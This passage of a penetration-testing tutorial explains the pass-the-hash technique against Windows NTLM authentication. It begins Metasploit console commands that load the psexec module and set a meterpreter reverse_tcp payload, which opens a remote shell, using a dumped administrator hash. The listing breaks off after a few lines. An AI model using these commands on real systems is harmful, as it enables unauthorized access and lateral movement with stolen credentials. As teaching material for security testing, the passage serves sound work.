Pass the Hash

In the preceding example, we ran into a slight complication: we have the administrator's username and password hash, but we can't crack the password in a reasonable time frame. If we don't know the password, how can we log into additional machines and potentially compromise more systems with this one user account?

We can use the pass-the-hash technique, which requires only the password hash, not the password itself. It works because NTLM authentication never transmits the password: the NT hash is the key used to compute the challenge response, so anyone holding the hash can authenticate as that user. Metasploit's windows/smb/psexec module makes this possible. Its SMBPass option accepts the LM:NTLM hash pair exactly as hashdump printed it, and the account must still hold local administrator rights on the target, since psexec needs to write and start a service there:

msf> use windows/smb/psexec
msf exploit(psexec)> set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
...
